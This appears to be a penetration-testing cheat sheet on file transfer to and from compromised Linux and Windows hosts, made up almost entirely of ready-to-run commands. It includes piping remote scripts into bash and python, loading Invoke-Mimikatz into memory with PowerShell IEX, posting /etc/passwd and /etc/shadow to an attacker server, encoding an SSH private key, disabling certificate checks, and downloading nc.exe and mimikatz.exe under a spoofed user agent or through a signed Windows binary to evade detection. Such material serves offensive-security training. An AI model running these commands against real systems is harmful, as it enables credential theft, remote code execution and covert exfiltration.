# File Transfers ## Download Operations ## Terminal String Copy & Paste ### Linux Encode Base64 {% code overflow="wrap" %} ``` cat id_rsa |base64 -w 0;echo ``` {% endcode %}

### Windows Decode & Write Base64 {% code overflow="wrap" %} ``` [IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("BASE 64 STRING")) ``` {% endcode %}

cmd.exe has a maximum string length of 8,191 & powershell.exe has a maximum string length 2,147,483,647 characters

## Web Downloads with Wget & cURL ### **Download a File Using wget** {% code overflow="wrap" %} ``` wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh ``` {% endcode %}

### **Fileless Download with wget** {% code overflow="wrap" %} ``` wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3 ``` {% endcode %}

### **Download a File Using cURL** {% code overflow="wrap" %} ``` curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh ``` {% endcode %}

### **Fileless Download with cURL** {% code overflow="wrap" %} ``` curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash ``` {% endcode %}

## Download with Bash (/dev/tcp) ### **Connect to the Target Webserver** {% code overflow="wrap" %} ``` exec 3<>/dev/tcp/10.10.10.32/80 ``` {% endcode %}

### **HTTP GET Request** {% code overflow="wrap" %} ``` echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 ``` {% endcode %}

### **Print the Response** {% code overflow="wrap" %} ``` cat <&3 ``` {% endcode %}

## PowerShell Web Downloads ### **DownloadFile Method** {% code overflow="wrap" %} ``` (New-Object Net.WebClient).DownloadFile('','') ``` {% endcode %}

### **DownloadString - Fileless Method** {% code overflow="wrap" %} ``` IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') ``` {% endcode %}

### **Invoke-WebRequest** {% code overflow="wrap" %} ``` Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 ``` {% endcode %}

You can use the aliases `iwr`, `curl`, and `wget` instead of the `Invoke-WebRequest` full name

### **Common Errors with PowerShell**

There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download. This can be bypassed using the parameter -UseBasicParsing

{% code overflow="wrap" %} ``` Invoke-WebRequest https:///PowerView.ps1 -UseBasicParsing | IEX ``` {% endcode %}

{% code overflow="wrap" %} ```powershell-session IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') ``` {% endcode %}

Another error in PowerShell downloads is related to the SSL/TLS secure channel if the certificate is not trusted. We can bypass that error with the following command

{% code overflow="wrap" %} ``` [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ``` {% endcode %} ## SMB Downloads ### **Create the SMB Server** {% code overflow="wrap" %} ``` sudo impacket-smbserver share -smb2support /tmp/smbshare ``` {% endcode %}

### Copy a File from the SMB Server {% code overflow="wrap" %} ``` copy \\192.168.220.133\share\nc.exe ``` {% endcode %}

New versions of Windows block unauthenticated guest access

### **Create the SMB Server with Username & Password** {% code overflow="wrap" %} ``` sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test ``` {% endcode %}

### **Mount the SMB Server with Username and Password** {% code overflow="wrap" %} ``` net use n: \\192.168.220.133\share /user:test test ``` {% endcode %}

You can also mount the SMB server if you receive an error when you use `copy filename \\IP\sharename`.

## FTP Downloads ### **Installing the FTP Server Python3 Module - pyftpdlib** {% code overflow="wrap" %} ``` sudo pip3 install pyftpdlib ``` {% endcode %}

### **Setting up a Python3 FTP Server** {% code overflow="wrap" %} ``` sudo python3 -m pyftpdlib --port 21 ``` {% endcode %}

### **Transfering Files from an FTP Server Using PowerShell** {% code overflow="wrap" %} ``` (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt') ``` {% endcode %}

### **Command File for FTP Client To Download File** {% code overflow="wrap" %} ``` echo open 192.168.49.128 > ftpcommand.txt echo USER anonymous >> ftpcommand.txt echo binary >> ftpcommand.txt echo GET file.txt >> ftpcommand.txt echo bye >> ftpcommand.txt ftp -v -n -s:ftpcommand.txt ``` {% endcode %}

You may not have an interactive shell. If that's the case, we can create an FTP command file to download a file

## Upload Operations ## Terminal String Copy & Paste ### Windows Encode & Write Base64 {% code overflow="wrap" %} ``` [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte)) ``` {% endcode %}

### Linux Decode Base64 {% code overflow="wrap" %} ``` echo Base64string | base64 -d > hosts ``` {% endcode %}

## Web Uploads with cURL {% code overflow="wrap" %} ``` curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure ``` {% endcode %}

## PowerShell Web Uploads ### **Installing a Configured WebServer with Upload** {% code overflow="wrap" %} ``` pip3 install uploadserver ``` {% endcode %} ``` python3 -m uploadserver ```

### **PowerShell Script to Upload a File to Python Upload Server** {% code overflow="wrap" %} ``` IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') ``` {% endcode %} {% code overflow="wrap" %} ``` Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts ``` {% endcode %}

### PowerShell Base64 Web Upload {% code overflow="wrap" %} ``` $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)) ``` {% endcode %} {% code overflow="wrap" %} ``` Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64 ``` {% endcode %}

{% code overflow="wrap" %} ``` nc -lvnp 8000 ``` {% endcode %}

{% code overflow="wrap" %} ``` echo | base64 -d -w 0 > hosts ``` {% endcode %} ## SMB Uploads

Commonly enterprises don't allow the SMB protocol (TCP/445). An alternative is to run SMB over HTTP with `WebDav`. When you use `SMB`, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP

### **Installing WebDav Python modules** {% code overflow="wrap" %} ``` sudo pip3 install wsgidav cheroot ``` {% endcode %}

### **Using the WebDav Python module** {% code overflow="wrap" %} ``` sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous ``` {% endcode %}

### **Connecting to the Webdav Share** {% code overflow="wrap" %} ``` dir \\192.168.49.128\DavWWWRoot ``` {% endcode %}

DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. You can avoid using this keyword if you specify a folder that exists on your server when connecting to the server. For example: \192.168.49.128\sharefolder

### **Uploading Files using SMB** {% code overflow="wrap" %} ``` copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\ ``` {% endcode %} {% code overflow="wrap" %} ``` copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\ ``` {% endcode %}

If there are no SMB (TCP/445) restrictions, you can use impacket-smbserver the same way we set it up for download operations.

### FTP Uploads ``` sudo python3 -m pyftpdlib --port 21 --write ```

You need to specify the option `--write` to allow clients to upload files to our attack host

### **PowerShell Upload File** {% code overflow="wrap" %} ``` (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts') ``` {% endcode %}

### **Command File for FTP Client to Upload File** {% code overflow="wrap" %} ``` echo open 192.168.49.128 > ftpcommand.txt echo USER anonymous >> ftpcommand.txt echo binary >> ftpcommand.txt echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt echo bye >> ftpcommand.txt ftp -v -n -s:ftpcommand.txt ``` {% endcode %}

## **Mounting a Linux Folder With RDP** ### **Mounting Using rdesktop** {% code overflow="wrap" %} ``` rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files' ``` {% endcode %}

### **Mounting Using xfreerdp** {% code overflow="wrap" %} ``` xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer ``` {% endcode %}

## Evading Detection ### **Listing out User Agents** {% code overflow="wrap" %} ``` [Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl ``` {% endcode %}

### **Request with Chrome User Agent** {% code overflow="wrap" %} ``` $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome ``` {% endcode %} {% code overflow="wrap" %} ``` Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe" ``` {% endcode %}

### **Transferring File with GfxDownloadWrapper.exe** {% code overflow="wrap" %} ``` GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe" ``` {% endcode %}